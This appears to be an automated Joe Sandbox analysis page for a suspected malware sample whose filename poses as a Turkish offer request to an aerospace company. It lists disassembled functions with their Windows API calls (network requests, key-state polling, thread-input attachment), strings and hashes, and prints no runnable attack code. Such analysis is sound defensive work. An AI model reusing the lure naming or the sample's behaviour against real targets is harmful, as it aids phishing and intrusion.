Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2c8d5791a7ac85769c9fd627c5b3d5ade73b260e23e916a21526674a5f417449
Instruction ID: 68d4fc698242924dbdc3457530a4a193c7c7dd348d337d1be33f093b10ff98ad
Opcode Fuzzy Hash: 2c8d5791a7ac85769c9fd627c5b3d5ade73b260e23e916a21526674a5f417449
Instruction Fuzzy Hash: 8991AD34618302AFE720DF15D8C8F1ABBE4AF49318F1485A9E4698B6A2C774ED51CF91

Function 00208CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00208CF3

Part of subcall function 001E8E54: _wcslen.LIBCMT ref: 001E8E77

_wcslen.LIBCMT ref: 00208D4E
_wcslen.LIBCMT ref: 00208D9C
_wcslen.LIBCMT ref: 00208DDC
_wcslen.LIBCMT ref: 00208E6E

Strings

winapi, xrefs: 00208D96, 00208D9B
stdcall, xrefs: 00208DD6, 00208DDB
none, xrefs: 00208E65, 00208E6A
cdecl, xrefs: 00208D48, 00208D4D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 14c11634b61e82498f64e3f54887202caa62eb106c33c1a38fb8e9d3b64b2433
Instruction ID: 1350949ea418b1392e5a3e72a30cd866393cc5f1696adcb1ff83ed94b7919a8c
Opcode Fuzzy Hash: 14c11634b61e82498f64e3f54887202caa62eb106c33c1a38fb8e9d3b64b2433
Instruction Fuzzy Hash: DC51B331A206179BCF14DF68C9408BFB7A5BF65724B214229F4A5E72C6EB70DE50C790

Function 0020372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00203774
CoUninitialize.OLE32 ref: 0020377F
CoCreateInstance.OLE32(?,00000000,00000017,0021FB78,?), ref: 002037D9
IIDFromString.OLE32(?,?), ref: 0020384C
VariantInit.OLEAUT32(?), ref: 002038E4
VariantClear.OLEAUT32(?), ref: 00203936

Strings

Invalid parameter, xrefs: 00203865
Failed to create object, xrefs: 002037E4, 0020389A
NULL Pointer assignment, xrefs: 0020381E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 6b900dbee3a476deed48f9836a267f9d734e94ff80625199130664ea42172182
Instruction ID: 78197ddf65abed70a9ef1d402d3524e80513edb5576ddbb90e1968753c6ebc34
Opcode Fuzzy Hash: 6b900dbee3a476deed48f9836a267f9d734e94ff80625199130664ea42172182
Instruction Fuzzy Hash: EB61D070628701AFD311DF54D888F6AB7E8EF59700F104849F9859B2E2C7B0EE58CB92

Function 00218B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

Part of subcall function 0019912D: GetCursorPos.USER32(?), ref: 00199141
Part of subcall function 0019912D: ScreenToClient.USER32(00000000,?), ref: 0019915E
Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000001), ref: 00199183
Part of subcall function 0019912D: GetAsyncKeyState.USER32(00000002), ref: 0019919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00218B6B
ImageList_EndDrag.COMCTL32 ref: 00218B71
ReleaseCapture.USER32 ref: 00218B77
SetWindowTextW.USER32(?,00000000), ref: 00218C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00218C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00218CFF

Strings

p#%, xrefs: 00218C71
@GUI_DROPID, xrefs: 00218C51
@GUI_DRAGFILE, xrefs: 00218C9A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#%
API String ID: 1924731296-931395690
Opcode ID: e53ebbddb5192f25b8723f267602a2c9e6459d6450671a9e0408b63fafdd6e16
Instruction ID: eaa338c3b7a4fc1d04c1b552e3d2f2f3b98af2d861ee4b1e8d76c5b4e3c1247d
Opcode Fuzzy Hash: e53ebbddb5192f25b8723f267602a2c9e6459d6450671a9e0408b63fafdd6e16
Instruction Fuzzy Hash: A451AD71104300AFD704EF24DC9AFAA77E4FB98715F50062DF956A72E1CB709A64CBA2

Function 001F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001F33CF

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001F33F0

Strings

Error: , xrefs: 001F34D1
"%s" (%d) : ==> %s:%s%s, xrefs: 001F3504
"%s" (%d) : ==> %s:, xrefs: 001F3522
^ ERROR , xrefs: 001F349E
Incorrect parameters to object property !, xrefs: 001F34AB
Line %d (File "%s"):, xrefs: 001F3443, 001F345C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 7b4f5b27b2f26000c7e2373d63662afc09db6d4c9b73b07c2a234e580ca38c56
Instruction ID: c3fcdc3e27ae808c69bdcf312f72043f36ef285da1760ab48cc87db1ede4400e
Opcode Fuzzy Hash: 7b4f5b27b2f26000c7e2373d63662afc09db6d4c9b73b07c2a234e580ca38c56
Instruction Fuzzy Hash: D1518B71900209BADF19EBA0DD46EFEB378AF25700F244065F515720A2EB352F68DF61

Function 001EB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001EB5FC
_wcslen.LIBCMT ref: 001EB608
_wcslen.LIBCMT ref: 001EB64D
_wcslen.LIBCMT ref: 001EB68C
_wcslen.LIBCMT ref: 001EB6C7

Strings

KEYS, xrefs: 001EB647, 001EB64C
REMOVE, xrefs: 001EB602, 001EB607
APPEND, xrefs: 001EB6C1, 001EB6C6
EXISTS, xrefs: 001EB686, 001EB68B

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: fba226d4e199a3c48d07a2944032446a0240552caf79a1adce78c78df30917e8
Instruction ID: 8019011aa8266c430be86afa5468d3273b14b881d4e671f5123f5f4bf51ddc4a
Opcode Fuzzy Hash: fba226d4e199a3c48d07a2944032446a0240552caf79a1adce78c78df30917e8
Instruction Fuzzy Hash: CB41F832A084679BCB206F7EC8D05BFB7A5AFA9B54B254129E421DB284E731CD81C790

Function 001F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001F53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001F5416
GetLastError.KERNEL32 ref: 001F5420
SetErrorMode.KERNEL32(00000000,READY), ref: 001F54A7

Strings

UNKNOWN, xrefs: 001F5444
NOTREADY, xrefs: 001F544B
INVALID, xrefs: 001F5459
READONLY, xrefs: 001F5452
READY, xrefs: 001F5460, 001F5468

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: bb151c995089ac128b8b90b30c19924de317f38e526157891ccc6b5912a49310
Instruction ID: c5a5f6117b0fc2cf678851a97a5c58040688915d704256750ef1cb6f4a59ac5e
Opcode Fuzzy Hash: bb151c995089ac128b8b90b30c19924de317f38e526157891ccc6b5912a49310
Instruction Fuzzy Hash: 5731C375A00609DFC714DF68C488ABABBB5FF55305F148069E706CB292EB31DD82CBA1

Function 00213C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00213C79
SetMenu.USER32(?,00000000), ref: 00213C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00213D10
IsMenu.USER32(?), ref: 00213D24
CreatePopupMenu.USER32 ref: 00213D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00213D5B
DrawMenuBar.USER32 ref: 00213D63

Strings

F, xrefs: 00213D4E
0, xrefs: 00213C54

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ef0945e33315eb2060a3f8f13ff91aebd1e9e097a5425b89a7ed6be907f14bf7
Instruction ID: 83bb7159ab89f38b2080ec90ad84c73cb1a86a69d32b079eb358d2d43593144d
Opcode Fuzzy Hash: ef0945e33315eb2060a3f8f13ff91aebd1e9e097a5425b89a7ed6be907f14bf7
Instruction Fuzzy Hash: 25418C78A1120AAFDB14CF64E848BDA77F6FF59304F144029E906A7360DB70AA20CF94

Function 00213A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00213A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00213AA0
GetWindowLongW.USER32(?,000000F0), ref: 00213AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00213AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00213B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00213BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00213BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00213BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00213BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00213C13

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 560edb3d12467b4a541e3b038a7ed3f5856a38776612af879b975ba9a8ab81f2
Instruction ID: 8a4f571888d6f2bd768510d1b332de2157054f4f1472f98cab789013ccf1c241
Opcode Fuzzy Hash: 560edb3d12467b4a541e3b038a7ed3f5856a38776612af879b975ba9a8ab81f2
Instruction Fuzzy Hash: EF618975900248AFDB10DFA8CC85EEE77F9EB19314F10009AFA15A72A1D770AE95DB50

Function 001EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001EB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB165
GetWindowThreadProcessId.USER32(00000000), ref: 001EB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 001EB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001EA1E1,?,00000001), ref: 001EB21D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: adbf990ac28ed89bd37485fbeccea16aa84b71f23df3899829989020becd46de
Instruction ID: 846a2c9e410ab4e33cdbb1a83fbff6ca0465f5e364cb7f16604b4452015b03c8
Opcode Fuzzy Hash: adbf990ac28ed89bd37485fbeccea16aa84b71f23df3899829989020becd46de
Instruction Fuzzy Hash: F131AC79544745BFDB10DF25FC8CBBE7BA9AF60352F208014FA01D6190DBB4AA008F68

Function 001B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001B2C94

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001B2CA0
_free.LIBCMT ref: 001B2CAB
_free.LIBCMT ref: 001B2CB6
_free.LIBCMT ref: 001B2CC1
_free.LIBCMT ref: 001B2CCC
_free.LIBCMT ref: 001B2CD7
_free.LIBCMT ref: 001B2CE2
_free.LIBCMT ref: 001B2CED
_free.LIBCMT ref: 001B2CFB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e86c4a864dfde6dfad2a1f53aec72ae100cafa97669b073034b21b809b2e1e5d
Instruction ID: 21fed75265b7dbf4cc559d29f62ca1f03e3a5af7714f3a2d318c181da8d40b90
Opcode Fuzzy Hash: e86c4a864dfde6dfad2a1f53aec72ae100cafa97669b073034b21b809b2e1e5d
Instruction Fuzzy Hash: 7111A476100118BFCB02EF94D982CDD3BA5FF19354F4148A5FA489F222DB31EE549B90

Function 00181410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00181459
OleUninitialize.OLE32(?,00000000), ref: 001814F8
UnregisterHotKey.USER32(?), ref: 001816DD
DestroyWindow.USER32(?), ref: 001C24B9
FreeLibrary.KERNEL32(?), ref: 001C251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001C254B

Strings

close all, xrefs: 00181454

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 69524a304921dee6db42fdea15e5627c117c2437916512022e56383919e8975d
Instruction ID: 890ee80f46db83a07a867772a06f9d96a67a23b51f302f815ba2086ac78eca79
Opcode Fuzzy Hash: 69524a304921dee6db42fdea15e5627c117c2437916512022e56383919e8975d
Instruction Fuzzy Hash: FED127327012129FCB29EF14D499F69F7A4BF25700F2542ADE84AAB251DB30EE12CF50

Function 00185BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00185C7A

Part of subcall function 00185D0A: GetClientRect.USER32(?,?), ref: 00185D30
Part of subcall function 00185D0A: GetWindowRect.USER32(?,?), ref: 00185D71
Part of subcall function 00185D0A: ScreenToClient.USER32(?,?), ref: 00185D99

GetDC.USER32 ref: 001C46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001C4708
SelectObject.GDI32(00000000,00000000), ref: 001C4716
SelectObject.GDI32(00000000,00000000), ref: 001C472B
ReleaseDC.USER32(?,00000000), ref: 001C4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001C47C4

Strings

U, xrefs: 001C4693

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f6b82cd2c0d95aae58dd929ad2083e23ff2f1988a4f6e69a93bfca2c187ed2d2
Instruction ID: 7dd9931d4c52fd8be4d5a4d6eb12da0f31e67be7c0600dc9ec2b8a56cd2479fa
Opcode Fuzzy Hash: f6b82cd2c0d95aae58dd929ad2083e23ff2f1988a4f6e69a93bfca2c187ed2d2
Instruction Fuzzy Hash: D171DA34404204DFCF259F64C994FEA3BB6FF6A324F244269ED555A2AAC730C991DF60

Function 001F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001F35E4

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

LoadStringW.USER32(00252390,?,00000FFF,?), ref: 001F360A

Strings

Error: , xrefs: 001F36EF
"%s" (%d) : ==> %s:%s%s, xrefs: 001F3724
"%s" (%d) : ==> %s:, xrefs: 001F3742
Line %d (File "%s"):, xrefs: 001F366B
^ ERROR, xrefs: 001F36C9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 80b47fe4de2439fc46c7c27eccbb64c9a029ee2e5135605f12ec191b0ec92e65
Instruction ID: c9520b348b8593a0e5a40bd0316dd3f19116c5164778a538ef972ea34b28a837
Opcode Fuzzy Hash: 80b47fe4de2439fc46c7c27eccbb64c9a029ee2e5135605f12ec191b0ec92e65
Instruction Fuzzy Hash: AB517D7180020ABADF14FBA0DC46EFEBB78AF25300F184165F615721A1EB311B99DFA1

Function 001FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001FC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001FC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001FC2CA
GetLastError.KERNEL32 ref: 001FC322
SetEvent.KERNEL32(?), ref: 001FC336
InternetCloseHandle.WININET(00000000), ref: 001FC341

Strings

, xrefs: 001FC2BB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

